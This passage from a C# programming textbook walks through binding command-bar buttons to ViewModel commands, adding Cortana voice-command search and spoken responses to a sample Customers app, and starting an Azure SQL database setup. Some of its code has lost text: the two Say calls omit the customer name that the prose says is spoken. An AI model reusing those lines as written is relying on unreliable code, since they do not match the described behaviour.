this.customers.Count > 0 && !this.IsAtStart);
this.customers = new List<Customer>
{
...
};
}
The NextCustomer Command specifies the Next method as the operation
to perform when the Execute method is invoked. The lambda expression
() => { return this.customers.Count > 1 && !this.IsAtEnd; } is specified
as the function to call when the CanExecute method runs.
This expression returns true as long as the customers list contains more
than one customer and the ViewModel is not positioned on the final
customer in this list. The PreviousCustomer Command follows the same
pattern: it invokes the Previous method to retrieve the previous customer
from the list, and the CanExecute method references the expression ()
=> { return this.customers.Count > 0 && !this.IsAtStart; }, which
returns true as long as the customers list contains at least one customer
and the ViewModel is not positioned on the first customer in this list.
9. On the Build menu, click Build Solution and verify that your app still
builds without errors.
Now that you have added the NextCustomer and PreviousCustomer
commands to the ViewModel, you can bind these commands to buttons in the
view. When the user clicks a button, the appropriate command will run.
Microsoft publishes guidelines for adding buttons to views in UWP apps,
and the general recommendation is that buttons that invoke commands should
be placed on a command bar. UWP apps provide two command bars: one
appears at the top of the form and the other at the bottom. Buttons that
navigate through an app or data are commonly placed on the top command
bar, and this is the approach that you will adopt in the next exercise.
Note You can find the Microsoft guidelines for implementing command
bars at http://msdn.microsoft.com/library/windows/apps/hh465302.aspx.
Add Next and Previous buttons to the Customers form
1. Open the MainPage.xaml file in the Design View window.
2. Scroll to the bottom of the XAML pane and add the following markup
shown in bold, immediately after the final </Grid> tag but before the
closing </Page> tag:
...
</Grid>
<Page.TopAppBar>
<CommandBar>
<AppBarButton x:Name="previousCustomer"
Icon="Previous"
Label="Previous" Command="{Binding Path=PreviousCustomer}"/>
<AppBarButton x:Name="nextCustomer" Icon="Next"
Label="Next" Command="{Binding Path=NextCustomer}"/>
</CommandBar>
</Page.TopAppBar>
</Page>
There are several points to notice in this fragment of XAML markup:
By default, the command bar appears at the top of the screen and
displays icons for the buttons that it contains. The label for each
button is displayed only when the user clicks the More (…) button
that appears on the right side of the command bar. However, if
you are designing an application that could be used across
multiple countries or cultures, you should not provide hard-coded
values for labels but should instead store the text for these labels
in a culture-specific resources file and set the Label property
dynamically when the application runs (see the sketch after this
list). For more information,
visit the page “Quickstart: Translating UI resources (XAML)” on
the Microsoft website at
https://msdn.microsoft.com/library/windows/apps/xaml/hh965329.aspx
The CommandBar control can contain only a limited set of
controls (controls that implement the ICommandBarElement
interface). This set includes the AppBarButton,
AppBarToggleButton, and AppBarSeparator controls. These
controls are specifically designed to operate within a
CommandBar. If you attempt to add a control such as a button to a
command bar, you will receive the error message “The specified
value cannot be assigned to the collection.”
The UWP app templates include a variety of stock icons (such as
for Previous and Next, shown in the sample code above) that you
can display on an AppBarButton control. You can also define your
own icons and bitmaps.
Each button has a Command property, which is the property that
you can bind to an object that implements the ICommand
interface. In this application, you have bound the buttons to the
PreviousCustomer and NextCustomer commands in the
ViewModel class. When the user clicks either of these buttons at
runtime, the corresponding command will run.
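As noted in the first bullet point, label text can be retrieved from a
culture-specific resources file at run time instead of being hard-coded. The
following is a minimal sketch, assuming a string resource named
"PreviousLabel" has been added to the app's Resources.resw file:

// ResourceLoader reads strings from the resources file that matches
// the current culture of the device.
var loader = new Windows.ApplicationModel.Resources.ResourceLoader();
this.previousCustomer.Label = loader.GetString("PreviousLabel");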
3. On the Debug menu, click Start Debugging.
The Customers form should appear and display the details for John
Sharp. The command bar should be displayed at the top of the form and
contain the Next and Previous buttons, as shown in the following image:
Notice that the Previous button is not available. This is because the
IsAtStart property of the ViewModel is true, and the CanExecute
method of the Command object referenced by the Previous button
indicates that the command cannot run.
4. Click the ellipsis button on the command bar. The labels for the buttons
should appear. These labels will be displayed until you click one of the
buttons on the command bar.
5. On the command bar, click Next.
The details for customer 2, Diana Sharp, should appear, and after a short
delay (of up to one second), the Previous button should become
available. The IsAtStart property is no longer true, so the CanExecute
method of the command returns true. However, the button is not notified
of this change in state until the timer object in the command expires and
triggers the CanExecuteChanged event, which might take up to a second
to occur.
Note If you require a more instantaneous reaction to the change in
state of commands, you can arrange for the timer in the Command
class to expire more frequently. However, avoid reducing the time
by too much because raising the CanExecuteChanged event too
frequently can impact the performance of the UI.
6. On the command bar, click Next again.
7. The details for customer 3, Francesca Sharp, should appear, and after a
short delay of up to one second, the Next button should no longer be
available. This time, the IsAtEnd property of the ViewModel is true, so
the CanExecute method of the Command object for the Next button
returns false, and the command is disabled.
8. Resize the window to display the app in the narrow view and verify that
the app continues to function correctly. The Next and Previous buttons
should step forward and backward through the list of customers.
9. Return to Visual Studio and stop debugging.
Searching for data using Cortana
A key feature of Windows 10 apps is the ability to integrate with the voice-
activated digital assistant, also known as Cortana. Using Cortana, you can
activate applications and pass them commands. A common requirement is to
use Cortana to initiate a search request and have an application respond with
the results of that request. The app can send the results back to Cortana for
display (known as background activation), or the app itself can display the
results (known as foreground activation). In this section, you will extend the
Customers app to enable a user to search for specific customers by name.
You can expand this example to cover other attributes or possibly combine
search elements into more complex queries.
Note The exercises in this section assume that you have enabled
Cortana. To do this, click the Search button on the Windows taskbar. In
the toolbar on the left side of the window, click Settings (the cog icon).
In the Settings window, click the Talk to Cortana tab, and make sure
that Cortana is configured to respond.
Cortana also requires that you have signed in to your computer by
using a Microsoft account, and will prompt you to connect if necessary.
This step is required because speech recognition is handled by an
external service running in the cloud rather than on your local device.
Adding voice activation to an app is a three-stage process:
1. Create a voice-command definition (VCD) file that describes the
commands to which your app can respond. This is an XML file that you
deploy as part of your application.
2. Register the voice commands with Cortana. You typically do this when
the app starts running. You must run the app at least once before
Cortana will recognize it. Thereafter, if Cortana associates a particular
command with your app, it will launch your app automatically. To avoid
cluttering up its vocabulary, Cortana will “forget” commands associated
with an app if the app is not activated for a couple of weeks, and the
commands have to be registered again to be recognized. Therefore, it is
common practice to register voice commands every time the app starts
running—to reset the “forget” counter and give the app another couple
of weeks of grace.
3. Handle voice activation in your app. Your app is passed information
from Cortana about the command that causes the app to be activated. It
is the responsibility of your code to parse this command, extract any
arguments, and perform the appropriate operations. This is the most
complicated part of implementing voice integration.
The following exercises walk through this process using the Customers
app.
Create the voice-command definition (VCD) file for the Customers app
1. In Visual Studio, open the Customers solution in the \Microsoft
Press\VCSBS\Chapter 26\Cortana folder in your Documents folder.
This version of the Customers app has the same ViewModel that you
created in the previous exercise, but the data source contains details for
many more customers. The customer information is still held in a
List<Customer> object, but this object is now created by the
DataSource class in the DataSource.cs file. The ViewModel class
references this list instead of creating the small collection of three
customers used in the previous exercise.
2. In Solution Explorer, right-click the Customers project, point to Add,
and then click New Item.
3. In the Add New Item - Customers dialog box, in the left pane, click
Visual C#. In the middle pane, scroll down and select the XML File
template. In the Name box, type CustomerVoiceCommands.xml, and
then click Add, as shown in the following image:
Visual Studio generates a default XML file and opens it in the Code and
Text Editor window.
4. Add the following markup shown in bold to the XML file.
<?xml version="1.0" encoding="utf-8"?>
<VoiceCommands
xmlns="http://schemas.microsoft.com/voicecommands/1.2">
<CommandSet xml:lang="en-us" Name="CustomersCommands">
<CommandPrefix>Customers</CommandPrefix>
<Example>Show details of John Sharp</Example>
</CommandSet>
</VoiceCommands>
Voice commands are defined in a command set. Each command set has
a command prefix (specified by the CommandPrefix element), which
can be used by Cortana to identify the application at runtime. The
command prefix does not have to be the same as the name of the
application. For example, if your application name is lengthy or contains
numeric characters, Cortana might have difficulty recognizing it, so you
can use the command prefix to provide a shorter and more
pronounceable alias. The Example element contains a phrase that shows
how a user can invoke the command. Cortana displays this example in
response to inquiries such as “What can I say?” or “Help.”
Note The command prefix should reflect the purpose of the
application and should not conflict with other well-known
applications or services. For example, if you specify a command
prefix of “Facebook,” your application is unlikely to pass
verification testing if it is submitted to the Windows Store.
5. If you are not located in the United States, change the xml:lang attribute
of the CommandSet element to reflect your locale. For example, if you
are in the United Kingdom, specify xml:lang="en-gb".
This is important. If the language specified does not match your locale,
Cortana will not recognize your voice commands at runtime. The
rationale behind this is that you should specify a separate CommandSet
element for each locale in which your application will run. This enables
you to provide alternative commands for different languages. Cortana
uses the locale of the machine on which the app is running to determine
which command set to use.
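For example, a command set for the United Kingdom could be declared alongside
the United States set, as in the following sketch (the Name values are
illustrative; each CommandSet in the file must have a unique name):

<VoiceCommands xmlns="http://schemas.microsoft.com/voicecommands/1.2">
  <CommandSet xml:lang="en-us" Name="CustomersCommands_en-us">
    ...
  </CommandSet>
  <CommandSet xml:lang="en-gb" Name="CustomersCommands_en-gb">
    ...
  </CommandSet>
</VoiceCommands>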
6. Add the Command and PhraseTopic elements shown in bold to the
CommandSet element in the XML file:
<?xml version="1.0" encoding="utf-8"?>
<VoiceCommands
xmlns="http://schemas.microsoft.com/voicecommands/1.2">
<CommandSet xml:lang="en-us" Name="CustomersCommands">
<CommandPrefix>Customers</CommandPrefix>
<Example>Show details of John Sharp</Example>
<Command Name="showDetailsOf">
<Example>show details of John Sharp</Example>
<ListenFor RequireAppName="BeforeOrAfterPhrase">
show details of {customer}
</ListenFor>
<ListenFor RequireAppName="BeforeOrAfterPhrase">
show details for {customer}
</ListenFor>
<ListenFor RequireAppName="BeforeOrAfterPhrase">
search for {customer}
</ListenFor>
<Feedback>Looking for {customer}</Feedback>
<Navigate/>
</Command>
<PhraseTopic Label="customer" Scenario="Search">
<Subject>Person Names</Subject>
</PhraseTopic>
</CommandSet>
</VoiceCommands>
You can add one or more commands to a command set, each of which
can invoke a different operation in your application. Each command has
a unique identifier (the Name attribute). This identifier is passed to the
application that Cortana invokes so that the application can determine
which command the user spoke and thereby determine which operation
to perform.
The text in the Example element is displayed by Cortana if the user
selects your app in response to the query “What can I say?”; Cortana
will display the sample phrase for each of the commands that your app
understands.
The ListenFor element is used by Cortana to recognize the requests that
should invoke this app. You can specify multiple ListenFor phrases to
provide flexibility to the user. In this case, the user can speak three
variations of the same phrase to invoke the command. A phrase spoken
by the user should include either the name of the app or the prefix
specified in the CommandSet element. In this example, the name (or
prefix) can be specified at the beginning or end of the spoken phrase (the
RequireAppName attribute is set to BeforeOrAfterPhrase)—for
example, “Customers, show details of John Sharp” or “Search for John
Sharp in Customers.” The {customer} text in each ListenFor phrase is a
placeholder that is governed by the PhraseTopic element (described shortly).
The Feedback element is spoken by Cortana when it recognizes a
request. The customer name specified by the user is substituted into the
{customer} placeholder.
The Navigate element indicates that Cortana will start the app in the
foreground. You can optionally specify which page should be displayed
(if the app contains multiple pages) as the Target attribute of this
element. The Customers app contains only a single page, so the Target
attribute is not specified. If the app is intended to run in the background
and pass data back for Cortana to display, you specify a
VoiceCommandService element instead of Navigate. For more
information, visit the page “Launch a background app with voice
commands in Cortana” online at
https://msdn.microsoft.com/library/dn974228.aspx.
The PhraseTopic element is used to define a placeholder in spoken
phrases. The Label attribute specifies with which placeholder the
element is associated. At runtime, Cortana substitutes the word or words
spoken at this point in the phrase into the phrase topic. The Scenario
attribute and the Subject elements are optional and provide hints to
Cortana about how to interpret these words. In this example, the words
are being used as search arguments and constitute human names. You
can specify other scenarios such as Short Message or Natural Language,
in which case Cortana may attempt to parse these words differently. You
can also specify alternative subjects such as addresses, phone numbers, or
city and state.
7. On the File menu, click Save CustomerVoiceCommands.xml, and then
close the file.
8. In Solution Explorer, select the CustomerVoiceCommands.xml file. In
the Properties window, change the Copy To Output Directory property
to Copy If Newer.
This action causes the XML file to be copied to the application folder if
it changes and be deployed with the app.
The next step is to register the voice commands with Cortana when the
app runs. You can do this in the code for the OnLaunched method in the
App.xaml.cs file. The OnLaunched method occurs every time a Launched
event occurs when the application starts running. When the application shuts
down, you can save information about the application state (which customer
the user was viewing, for example), and you can use this event to restore the
state of the application (by displaying the same customer) when the
application starts up again. You can also use this event to perform operations
that should occur every time the application runs.
Register voice commands with Cortana
1. In Solution Explorer, expand App.xaml and then double-click
App.xaml.cs to display the file in the Code and Text Editor window.
2. Add the following using directives to the list at the top of the file.
using Windows.Storage;
using Windows.ApplicationModel.VoiceCommands;
using System.Diagnostics;
3. Find the OnLaunched method and enable asynchronous operations by
adding the async modifier:
protected async override void
OnLaunched(LaunchActivatedEventArgs e)
{
...
}
4. Add the code shown below in bold to the end of the OnLaunched
method:
protected async override void
OnLaunched(LaunchActivatedEventArgs e)
{
...
// Ensure the current window is active
Window.Current.Activate();
try
{
var storageFile = await Package.Current.
InstalledLocation.GetFileAsync(@"CustomerVoiceCommands.xml");
await VoiceCommandDefinitionManager.
InstallCommandDefinitionsFromStorageFileAsync(storageFile);
}
catch (Exception ex)
{
Debug.WriteLine($"Installing Voice Commands Failed:
{ex.ToString()}");
}
}
The first statement retrieves the XML file that contains the voice-
command definitions from the application folder. This file is then passed
to the VoiceCommandDefinitionManager manager. This class provides
the interface to the operating system for registering and querying voice-
command definitions. The static
InstallCommandDefinitionsFromStorageFileAsync method registers
voice commands found in the specified storage file. If an exception
occurs during this process, the exception is logged, but the application is
allowed to continue running (it just won’t respond to voice commands).
The final step of the process is to have your app respond when Cortana
recognizes a voice command intended for the app. In this case, you can
capture the Activated event by using the OnActivated method of the App
class. This method is passed a parameter of type IActivatedEventArgs, which
contains information describing data passed to the app, including the details
of any voice-activation commands.
Handle voice activation in the Customers app
1. In the Code and Text Editor window, add the OnActivated event method
shown here to the end of the App class, after the OnSuspending method:
protected override void OnActivated(IActivatedEventArgs args)
{
base.OnActivated(args);
}
This method invokes the overridden OnActivated method to perform any
default activation processing required before handling voice activation.
2. Add the following if statement block shown in bold to the OnActivated
method:
protected override void OnActivated(IActivatedEventArgs args)
{
base.OnActivated(args);
if (args.Kind == ActivationKind.VoiceCommand)
{
var commandArgs = args as
VoiceCommandActivatedEventArgs;
var speechRecognitionResult = commandArgs.Result;
var commandName =
speechRecognitionResult.RulePath.First();
}
}
This block determines whether the app has been activated by Cortana as
the result of a voice command. If so, the args parameter contains a
VoiceCommandActivatedEventArgs object. The Result property contains
a speechRecognitionResult object that contains information about the
command. The RulePath list in this object contains the elements of the
phrase that triggered activation, and the first item in this list contains the
name of the command recognized by Cortana. In the Customers
application, the only command defined in the
CustomerVoiceCommands.xml file is the showDetailsOf command.
3. Add the following code shown in bold to the if statement block in the
OnActivated method:
if (args.Kind == ActivationKind.VoiceCommand)
{
...
var commandName = speechRecognitionResult.RulePath.First();
string customerName = "";
switch (commandName)
{
case "showDetailsOf":
customerName =
speechRecognitionResult.SemanticInterpretation.
Properties["customer"].FirstOrDefault();
break;
default:
break;
}
}
The switch statement verifies that the voice command is the
showDetailsOf command. If you add more voice commands, you should
extend this switch statement. If the voice data contains some other
unknown command, it is ignored.
The SemanticInterpretation property of the speechRecognitionResult
object contains information about the properties of the phrase
recognized by Cortana. Commands for the Customers app include the
placeholder, and this code retrieves the text value for this placeholder as
spoken by the user and interpreted by Cortana.
4. Add the following code to the end of the OnActivated method, after the
switch statement:
protected override void OnActivated(IActivatedEventArgs args)
{
...
if (args.Kind == ActivationKind.VoiceCommand)
{
...
switch (commandName)
{
...
}
Frame rootFrame = Window.Current.Content as Frame;
if (rootFrame == null)
{
rootFrame = new Frame();
rootFrame.NavigationFailed += OnNavigationFailed;
Window.Current.Content = rootFrame;
}
rootFrame.Navigate(typeof(MainPage), customerName);
Window.Current.Activate();
}
}
The first block here is boilerplate code that ensures that an application
window is open to display a page. The second block displays the
MainPage page in this window. The Navigate method of the Frame
object causes MainPage to become the active page. The second
parameter is passed as an object that can be used by the page to provide
context information about what to display. In this code, the parameter is
a string containing the customer name.
5. Open the ViewModel.cs file in the Code and Text Editor window and
find the ViewModel constructor. The code in this constructor has been
refactored slightly, and the statements that initialize the view state have
been moved to a separate method named _initializeState, as shown here:
public ViewModel()
{
_initializeState();
this.customers = DataSource.Customers;
}
private void _initializeState()
{
this.currentCustomer = 0;
this.IsAtStart = true;
this.IsAtEnd = false;
this.NextCustomer = new Command(this.Next, () =>
this.customers.Count > 1 && !this.IsAtEnd);
this.PreviousCustomer = new Command(this.Previous, () =>
this.customers.Count > 0 && !this.IsAtStart);
}
6. Add another constructor to the ViewModel class. This constructor should
take a string containing a customer name and filter the records in the
data source by using this name, as follows:
public ViewModel(string customerName)
{
_initializeState();
string[] names = customerName.Split(new[] {' '}, 2,
StringSplitOptions.RemoveEmptyEntries);
this.customers =
(from c in DataSource.Customers
where string.Compare(c.FirstName.ToUpper(),
names[0].ToUpper()) == 0 &&
(names.Length > 1 ?
string.Compare(c.LastName.ToUpper(),
names[1].ToUpper()) == 0 : true)
select c).ToList();
}
A customer’s name can contain two parts: a first name and a last name.
The Split method of the String class can break a string into substrings
based on a list of separator characters. In this case, the Split method
divides the customer name into a maximum of two pieces if the user
provides a first name and a last name separated by one or more space
characters. The results are stored in the names array. The LINQ query
uses this data to find all customers where the first name matches the first
item in the names array and the last name matches the second item in the
names array. If the user specifies a single name, the names array will
contain only one item, and the LINQ query matches only against the
first name. To remove any case sensitivity, all string comparisons are
performed against the upper case versions of the strings. The resulting
list of matching customers is assigned to the customers list in the view
model.
7. Return to the MainPage.xaml.cs file in the Code and Text Editor
window.
8. Add the OnNavigatedTo method shown here to the end of the MainPage
class, after the constructor:
public sealed partial class MainPage : Page
{
public MainPage()
{
...
}
protected override void OnNavigatedTo(NavigationEventArgs e)
{
string customerName = e.Parameter as string;
if (!string.IsNullOrEmpty(customerName))
{
ViewModel viewModel = new ViewModel(customerName);
this.DataContext = viewModel;
}
}
}
The OnNavigatedTo method runs when the application displays
(navigates to) this page by using the Navigate method. Any arguments
provided appear in the Parameter property of the NavigationEventArgs
parameter. This code attempts to convert the data in the Parameter
property to a string, and if it is successful, it passes this string as the
customer name to the ViewModel constructor. The resulting ViewModel
(which should contain only customers that match this name) is then set
as the data context for the page.
9. On the Build menu, click Build Solution and verify that the solution
compiles successfully.
As a final bit of polish, the next exercise adds a set of icons that Windows
10 and Cortana can use to represent the app visually. These icons are more
colorful than the stock gray-and-white cross images provided by the Blank
App template.
Add icons to the Customers app
1. In Solution Explorer, right-click the Assets folder, point to Add, and
then click Existing Item.
2. In the Add Existing Item - Customers dialog box, move to the
\Microsoft Press\VCSBS\Chapter 26\Resources folder in your
Documents folder, select the three AdventureWorks logo files in this
folder, and then click Add.
3. In Solution Explorer, double-click the Package.appxmanifest file to
display it in the Manifest Designer window.
4. Click the Visual Assets tab. Then, in the left pane, click Medium Tile.
5. Scroll down to the Preview Images section, and in the list of Scaled
Assets click the ellipsis button directly below the Scale 100 image.
Browse to the Assets folder, click AdventureWorksLogo150x150.png,
and then click Open. The image for this asset should be displayed in the
box.
6. In the left pane, click App Icon. Scroll down to the Preview Images
section, and in the list of Scaled Assets click the ellipsis button directly
below the Scale 100 image. Browse to the Assets folder, click
AdventureWorksLogo44x44.png, and then click Open.
7. In the left pane, click Splash Screen. Scroll down to the Preview Images
section, and in the list of Scaled Assets click the ellipsis button directly
below the Scale 100 image. Browse to the Assets folder, click
AdventureWorksLogo620x300.png, and then click Open.
8. On the Debug menu, click Start Without Debugging to build and run the
application. Verify that the splash screen appears momentarily when the
app starts running, and then the details of the customer named Orlando
Gee are displayed. You should be able to move back and forth through
the list of customers as before. By running the app, you have also
registered the voice commands that Cortana can use to invoke the app.
9. Close the app.
You can now test voice activation for the Customers app.
Test the search capability
1. Activate Cortana, and then speak the following query or type it in the
search box:
Customers show details for Brian Johnson
Note Remember to alert Cortana first with the “Hey, Cortana”
prompt if you are talking rather than typing. Cortana should
respond in the same way regardless of whether you speak a
command or type it.
Cortana should recognize that this command should be directed to the
Customers app.
Cortana will then launch the Customers app and display the details for
Brian Johnson. Notice that the Previous and Next buttons in the
command bar are not available because there is only one matching
customer.
2. Return to Cortana, and then speak the following query or type it in the
search box:
Search for John in Customers
This time, the app finds all customers who have the first name, John.
More than one match is returned, and you can use the Previous and Next
buttons in the command bar to move between the results.
3. Experiment with other searches. Notice that you can use the forms
“Search for …,” “Show details for …,” and “Show details of …” with
the app name specified at the start of the command or at the end
(prefixed by “in”). Notice that if you type a query with a different form,
Cortana will not understand it and will instead perform a Bing search.
4. When you have finished, return to Visual Studio.
Providing a vocal response to voice commands
In addition to sending voice commands to an app, you can make an app
respond vocally. To do this, UWP apps make use of the speech synthesis
features provided by Windows 10. Implementing this functionality is actually
reasonably straightforward, but there is one piece of etiquette that you should
observe: an app should respond vocally only if it is spoken to. If the user
types a phrase instead of uttering it, the app should remain silent. Fortunately,
you can detect whether a command is spoken or typed by examining the
commandMode property returned by performing the semantic interpretation
of the command, as follows:
SpeechRecognitionResult speechRecognitionResult = ...;
string commandMode = speechRecognitionResult.SemanticInterpretation.
Properties["commandMode"].FirstOrDefault();
The value of the commandMode property is a string that will contain
either “text” or “voice” depending on how the user entered the command. In
the following exercise, you will use this string to determine whether the app
should respond vocally or remain silent.
Add a voice response to search requests
1. In Visual Studio, open the App.xaml.cs file and display it in the Code
and Text Editor window.
2. In the OnActivated method, add the following statement shown in bold:
protected override void OnActivated(IActivatedEventArgs args)
{
...
if (args.Kind == ActivationKind.VoiceCommand)
{
var commandArgs = args as
VoiceCommandActivatedEventArgs;
var speechRecognitionResult = commandArgs.Result;
var commandName =
speechRecognitionResult.RulePath.First();
string commandMode =
speechRecognitionResult.SemanticInterpretation.
Properties["commandMode"].FirstOrDefault();
string customerName = "";
...
}
}
3. At the end of the method, change the statement that calls the Navigate
method so that it passes in a NavigationArgs object as the second
parameter. This object wraps the customer name and the command
mode.
protected override void OnActivated(IActivatedEventArgs args)
{
...
if (args.Kind == ActivationKind.VoiceCommand)
{
...
switch (commandName)
{
...
}
...
rootFrame.Navigate(typeof(MainPage),
new NavigationArgs(customerName, commandMode));
Window.Current.Activate();
}
}
Visual Studio will report that the NavigationArgs type cannot be found.
This happens because the NavigationArgs type does not exist yet; you
need to create it.
4. Right-click the reference to the NavigationArgs object in the code, and
then click Quick Actions and Refactorings. In the Quick Actions popup,
click Generate Class For NavigationArgs In the new file, as shown here:
This action creates a new file, called NavigationArgs.cs, that contains a
class with private fields named customerName and commandMode,
together with a public constructor that populates these fields. You must
modify this class to make the fields accessible to the outside world. The
best way to achieve this is to convert the fields into read-only properties.
5. In Solution Explorer, double-click the NavigationArgs.cs file to display
it in the Code and Text Editor window.
6. Modify the customerName and commandMode fields to make them
read-only properties that can be accessed by other types in the application, as
shown in bold in the following code:
internal class NavigationArgs
{
internal string commandMode { get; }
internal string customerName { get; }
public NavigationArgs(string customerName, string
commandMode)
{
this.customerName = customerName;
this.commandMode = commandMode;
}
}
7. Return to MainPage.xaml.cs in the Code and Text Editor window and
locate the OnNavigatedTo method. Make this method async, and modify
the code in the body of this method as follows:
protected override async void OnNavigatedTo(NavigationEventArgs
e)
{
NavigationArgs args = e.Parameter as NavigationArgs;
if (args != null)
{
string customerName = args.customerName;
ViewModel viewModel = new ViewModel(customerName);
this.DataContext = viewModel;
if (args.commandMode == "voice")
{
if (viewModel.Current != null)
{
await Say($"Here are the details for ");
}
else
{
await Say($" was not found");
}
}
}
}
Note that the Say method has not been implemented yet. You will create
this method shortly.
8. Add the following using directives to the list at the top of the file:
using Windows.Media.SpeechSynthesis;
using System.Threading.Tasks;
9. Add the Say method shown here to the end of the MainPage class:
private async Task Say(string message)
{
    MediaElement mediaElement = new MediaElement();
    var synth = new SpeechSynthesizer();
    SpeechSynthesisStream stream =
        await synth.SynthesizeTextToStreamAsync(message);
    mediaElement.SetSource(stream, stream.ContentType);
    mediaElement.Play();
}
The SpeechSynthesizer class in the Windows.Media.SpeechSynthesis
namespace can generate a media stream containing speech synthesized
from text. This stream is then passed to a MediaElement object, which
plays it.
10. On the Debug menu, click Start Without Debugging to build and run the
application.
11. Activate Cortana, and then speak the following query:
Customers show details for Brian Johnson
Cortana should respond by displaying the details for Brian Johnson in
the Customers app and saying “Here are the details for Brian Johnson.”
12. Type the following query into the Cortana search box:
Customers show details for John
Verify that this time the application remains mute after displaying the
list of customers with the first name John.
13. Experiment by performing other queries, both by typing and by using your voice.
Close the app when you are finished.
Summary
In this chapter, you learned how to display data on a form by using data
binding. You saw how to set the data context for a form and how to create a
data source that supports data binding by implementing the
INotifyPropertyChanged interface. You also learned how to use the Model–
View–ViewModel pattern to create a UWP app, and you saw how to create a
ViewModel with which a view can interact with a data source by using
commands. Finally, you learned how to integrate an app with Cortana to
provide voice-activated search functionality.
Quick reference

To: Bind the property of a control to the property of an object
Do this: Use a data-binding expression in the XAML markup of the control. For example:

<TextBox ... Text="{Binding FirstName}" .../>

To: Enable an object to notify a binding of a change in a data value
Do this: Implement the INotifyPropertyChanged interface in the class that defines the object and raise the PropertyChanged event each time a property value changes. For example:

class Customer : INotifyPropertyChanged
{
    ...
    public event PropertyChangedEventHandler PropertyChanged;

    protected virtual void OnPropertyChanged(string propertyName)
    {
        if (PropertyChanged != null)
        {
            PropertyChanged(this,
                new PropertyChangedEventArgs(propertyName));
        }
    }
}

To: Enable a control that uses data binding to update the value of the property to which it is bound
Do this: Configure the data binding as two-way. For example:

<TextBox ... Text="{Binding FirstName, Mode=TwoWay}" .../>

To: Separate the business logic that runs when a user clicks a Button control from the user interface that contains the Button control
Do this: Use a ViewModel that provides commands implemented with the ICommand interface, and bind the Button control to one of these commands. For example:

<Button x:Name="nextCustomer" ... Command="{Binding Path=NextCustomer}"/>

To: Support searching in a UWP app by using Cortana
Do this: Add a voice-command definition (VCD) file to the application that specifies the commands to be recognized, and then register these commands when the application starts running by using the static InstallCommandDefinitionsFromStorageFileAsync method of the VoiceCommandDefinitionManager class. At runtime, capture the Activated event. If the ActivationKind value of the IActivatedEventArgs parameter to this event indicates a voice command, then parse the speech recognition data in the Result property of this parameter to determine the action to take.
CHAPTER 27
Accessing a remote database from a
Universal Windows Platform app
After completing this chapter, you will be able to:
Use the Entity Framework to create an entity model that can retrieve
and modify information held in a database.
Create a Representational State Transfer (REST) web service that
provides remote access to a database through an entity model.
Fetch data from a remote database by using a REST web service.
Insert, update, and delete data in a remote database by using a REST
web service.
Chapter 26, “Displaying and searching for data in a Universal Windows
Platform app,” shows how to implement the Model–View–ViewModel
(MVVM) pattern. It also explains how to separate the business logic of an
app from the user interface (UI) by using a ViewModel class that provides
access to the data in the model and implements commands that the UI can use
to invoke the logic of the app. Chapter 26 also illustrates how to use data
binding to display the data presented by the ViewModel and how the UI can
update this data. This all results in a fully functional Universal Windows
Platform (UWP) app.
In this chapter, you will turn your attention to the model aspect of the
MVVM pattern. In particular, you will see how to implement a model that a
UWP app can use to retrieve and update data in a remote database.
Retrieving data from a database
So far, the data you have used has been confined to a simple collection
embedded in the ViewModel of the app. In the real world, the data displayed
and maintained by an app is more likely to be stored in a data source such as
a relational database.
UWP apps cannot directly access a relational database by using
technologies provided by Microsoft (although some third-party database
solutions are available). This might sound like a severe restriction, but there
are sensible reasons for this limitation. Primarily, it eliminates dependencies
that a UWP app might have on external resources, making the app a
standalone item that can be easily packaged and downloaded from the
Windows Store without requiring users to install and configure a database-
management system on their computer. Additionally, many Windows 10
devices are resource constrained and don’t have the memory or disk space
available to run a local database-management system. However, many
business apps will still have a requirement to access a database; to address
this scenario, you can use a web service.
Web services can implement a variety of functions, but one common
scenario is to provide an interface with which an app can connect to a remote
data source to retrieve and update data. A web service can be located almost
anywhere, from the computer on which the app is running to a web server
hosted on a computer on a different continent. As long as you can connect to
the web service, you can use it to provide access to the repository of your
information. Microsoft Visual Studio provides templates and tools with
which you can build a web service very quickly and easily. The simplest
strategy is to base the web service on an entity model generated by using the
Entity Framework.
The Entity Framework is a powerful technology with which you can
connect to a relational database. It can reduce the amount of code that most
developers need to write to add data access capabilities to an app. This is
where you will start, but first, you need to set up the AdventureWorks
database, which contains the details of AdventureWorks customers.
Note There is not sufficient space in this book to go into great detail on
how to use the Entity Framework, and the exercises in this section walk
you through only the most essential steps to get started. If you want
more information, look at “Entity Framework” on the Microsoft website
at http://msdn.microsoft.com/data/aa937723.
To make the scenario more realistic, the exercises in this chapter show
you how to create the database in the cloud by using Microsoft Azure SQL
Database and how to deploy the web service to Azure. This architecture is
common to many commercial apps, including e-commerce applications,
mobile banking services, and even video streaming systems.
Note The exercises require that you have an Azure account and
subscription. If you don’t already have an Azure account, you can sign
up for a free trial account at https://azure.microsoft.com/pricing/free-
trial/. Additionally, Azure requires that you have a valid Microsoft
account with which it can associate your Azure account. You can sign
up for a Microsoft account at https://signup.live.com/.
Create an Azure SQL Database server and install the AdventureWorks
sample database
1. Using a web browser, connect to the Azure portal at
https://portal.azure.com. Sign in using your Microsoft account.
2. In the toolbar on the left of the portal, click New.
3. On the New page, click Databases, and then click SQL Database.
4. In the SQL Database pane, perform the following tasks:
a. In the Name box, type AdventureWorks.
b. Leave the Subscription box set to the name of your Azure
subscription.
c. In the Resource group box, click Create New, and type awgroup.
d. In the Select source drop-down list box, click
Sample(AdventureWorksLT).
e. In the Server section, click Configure required settings. In the New
Server pane, type a unique name for your server. (Use your company
name or even your own name; I used csharpstepbystep2017. If the
name you enter has been used by someone else, you will be alerted, in
which case enter another name.) Enter a name and password for the
administrator login (make a note of these items; I used JohnSharp,
but I am not going to tell you my password), select the location
closest to you, and then click Select to return to the SQL Database
pane.
f. Under the prompt “Want to use SQL elastic pool?” click Not now.
g. Click Pricing Tier. In the Choose Your Pricing Tier pane, click Basic
and then click Apply. (This is the cheapest option if you are paying
for the database yourself, and it will suffice for the exercises in this
chapter. If you are building a large-scale commercial app, you will
probably need to use a Premium pricing tier, which provides much
more space and higher performance but at a higher cost.)
Important Do not select any pricing tier other than Basic, and do
not enable SQL elastic pool, unless you want to receive a
potentially significant bill at the end of the month. For information
about SQL Database pricing, see https://azure.microsoft.com/en-
us/pricing/details/sql-database/.
h. Click Create, and wait while the database server and database are
created. You can monitor progress by clicking Notifications in the
toolbar.
5. In the toolbar on the left of the Azure portal, click All resources.
6. On the Browse page, in the All Resources pane, click your SQL server
(not the AdventureWorks SQL database).
7. In the toolbar on the left of the pane, click Firewall/Virtual Networks.
8. In the Firewall/Virtual Networks pane, click Add client IP.
